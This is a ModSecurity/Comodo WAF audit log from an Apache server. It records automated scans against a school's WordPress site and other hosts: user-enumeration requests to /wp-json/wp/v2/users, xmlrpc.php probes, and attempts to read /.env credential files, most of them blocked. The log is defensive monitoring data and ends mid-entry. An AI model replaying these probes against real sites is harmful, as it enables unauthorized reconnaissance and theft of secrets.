CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5620925d-Z-- --125efb72-A-- [04/May/2025:21:11:20 +0700] aBd1iOchPF6irSergtsEugAAAME 103.236.140.4 38204 103.236.140.4 8181 --125efb72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --125efb72-C-- demo.sayHello --125efb72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --125efb72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746367880772337 6137 (- - -) Stopwatch2: 1746367880772337 6137; combined=4376, p1=585, p2=3573, p3=31, p4=33, p5=92, sr=83, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --125efb72-Z-- --23a4066f-A-- [04/May/2025:21:22:54 +0700] aBd4PvnZiHJYHUAF8QfmeAAAABI 103.236.140.4 38260 103.236.140.4 8181 --23a4066f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23a4066f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23a4066f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746368574178702 3549 (- - -) Stopwatch2: 1746368574178702 3549; combined=1520, p1=480, p2=1000, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a4066f-Z-- --86e96a78-A-- [04/May/2025:21:23:11 +0700] aBd4T_nZiHJYHUAF8QfmegAAAAA 103.236.140.4 38264 103.236.140.4 8181 --86e96a78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86e96a78-C-- demo.sayHello --86e96a78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e96a78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746368591654827 6461 (- - -) Stopwatch2: 1746368591654827 6461; combined=4702, p1=602, p2=3861, p3=39, p4=43, p5=94, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e96a78-Z-- --cfcac114-A-- [04/May/2025:21:31:23 +0700] aBd6O-chPF6irSergtsEyAAAANU 103.236.140.4 38322 103.236.140.4 8181 --cfcac114-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.227.173.41 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cfcac114-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfcac114-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746369083893144 787 (- - -) Stopwatch2: 1746369083893144 787; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfcac114-Z-- --9801a836-A-- [04/May/2025:21:39:54 +0700] aBd8OvnZiHJYHUAF8QfmigAAAAI 103.236.140.4 38452 103.236.140.4 8181 --9801a836-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9801a836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9801a836-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369594240622 3245 (- - -) Stopwatch2: 1746369594240622 3245; combined=1438, p1=458, p2=947, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9801a836-Z-- --e66b5616-A-- [04/May/2025:21:40:01 +0700] aBd8QdsVQyl9V2B8Pt_CMwAAAEU 103.236.140.4 38464 103.236.140.4 8181 --e66b5616-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e66b5616-C-- demo.sayHello --e66b5616-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e66b5616-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369601284104 4973 (- - -) Stopwatch2: 1746369601284104 4973; combined=3537, p1=463, p2=2848, p3=33, p4=34, p5=94, sr=59, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e66b5616-Z-- --dfcd4d25-A-- [04/May/2025:21:41:21 +0700] aBd8kfnZiHJYHUAF8QfmjQAAAAs 103.236.140.4 38474 103.236.140.4 8181 --dfcd4d25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dfcd4d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfcd4d25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369681963456 3142 (- - -) Stopwatch2: 1746369681963456 3142; combined=1395, p1=471, p2=891, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfcd4d25-Z-- --3f2a734b-A-- [04/May/2025:21:41:29 +0700] aBd8mfnZiHJYHUAF8QfmjwAAAA8 103.236.140.4 38478 103.236.140.4 8181 --3f2a734b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f2a734b-C-- demo.sayHello --3f2a734b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f2a734b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369689715721 5572 (- - -) Stopwatch2: 1746369689715721 5572; combined=4140, p1=583, p2=3342, p3=27, p4=31, p5=92, sr=140, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f2a734b-Z-- --0715857a-A-- [04/May/2025:21:43:56 +0700] aBd9LNsVQyl9V2B8Pt_CNQAAAEo 103.236.140.4 38490 103.236.140.4 8181 --0715857a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0715857a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0715857a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369836308117 2925 (- - -) Stopwatch2: 1746369836308117 2925; combined=1297, p1=469, p2=798, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0715857a-Z-- --bb4cf076-A-- [04/May/2025:21:44:01 +0700] aBd9MfnZiHJYHUAF8QfmkgAAABM 103.236.140.4 38494 103.236.140.4 8181 --bb4cf076-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bb4cf076-C-- demo.sayHello --bb4cf076-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb4cf076-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369841007555 5785 (- - -) Stopwatch2: 1746369841007555 5785; combined=4168, p1=562, p2=3387, p3=31, p4=34, p5=92, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb4cf076-Z-- --e8c93a6d-A-- [04/May/2025:21:44:57 +0700] aBd9adsVQyl9V2B8Pt_COAAAAEM 103.236.140.4 38504 103.236.140.4 8181 --e8c93a6d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8c93a6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8c93a6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369897714120 14922 (- - -) Stopwatch2: 1746369897714120 14922; combined=26031, p1=394, p2=685, p3=0, p4=0, p5=12490, sr=70, sw=0, l=0, gc=12462 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8c93a6d-Z-- --01eb8f77-A-- [04/May/2025:21:45:04 +0700] aBd9cPnZiHJYHUAF8QfmkwAAABc 103.236.140.4 38508 103.236.140.4 8181 --01eb8f77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01eb8f77-C-- demo.sayHello --01eb8f77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01eb8f77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369904171681 6463 (- - -) Stopwatch2: 1746369904171681 6463; combined=4770, p1=597, p2=3935, p3=39, p4=42, p5=94, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01eb8f77-Z-- --47847607-A-- [04/May/2025:21:45:18 +0700] aBd9ftsVQyl9V2B8Pt_COwAAAFI 103.236.140.4 38512 103.236.140.4 8181 --47847607-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47847607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47847607-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369918207797 2884 (- - -) Stopwatch2: 1746369918207797 2884; combined=1264, p1=451, p2=781, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47847607-Z-- --a73db223-A-- [04/May/2025:21:45:26 +0700] aBd9hvnZiHJYHUAF8QfmlAAAAAM 103.236.140.4 38516 103.236.140.4 8181 --a73db223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a73db223-C-- demo.sayHello --a73db223-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a73db223-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369926574245 4768 (- - -) Stopwatch2: 1746369926574245 4768; combined=3630, p1=447, p2=2988, p3=22, p4=24, p5=88, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a73db223-Z-- --c9f5db0c-A-- [04/May/2025:21:45:38 +0700] aBd9ktsVQyl9V2B8Pt_CPQAAAFM 103.236.140.4 38520 103.236.140.4 8181 --c9f5db0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c9f5db0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9f5db0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746369938807480 2733 (- - -) Stopwatch2: 1746369938807480 2733; combined=1211, p1=429, p2=753, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9f5db0c-Z-- --b17d9d2c-A-- [04/May/2025:21:45:44 +0700] aBd9mNsVQyl9V2B8Pt_CPwAAAFQ 103.236.140.4 38524 103.236.140.4 8181 --b17d9d2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.239 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b17d9d2c-C-- demo.sayHello --b17d9d2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b17d9d2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746369944277777 5483 (- - -) Stopwatch2: 1746369944277777 5483; combined=4053, p1=505, p2=3329, p3=27, p4=29, p5=95, sr=70, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b17d9d2c-Z-- --1f71860b-A-- [04/May/2025:21:58:18 +0700] aBeAitsVQyl9V2B8Pt_CTAAAAEQ 103.236.140.4 38632 103.236.140.4 8181 --1f71860b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.212.77 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.212.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1f71860b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f71860b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746370698450779 776 (- - -) Stopwatch2: 1746370698450779 776; combined=326, p1=283, p2=0, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f71860b-Z-- --f29eb30b-A-- [04/May/2025:22:05:17 +0700] aBeCLechPF6irSergtsE2AAAANA 103.236.140.4 38688 103.236.140.4 8181 --f29eb30b-B-- GET 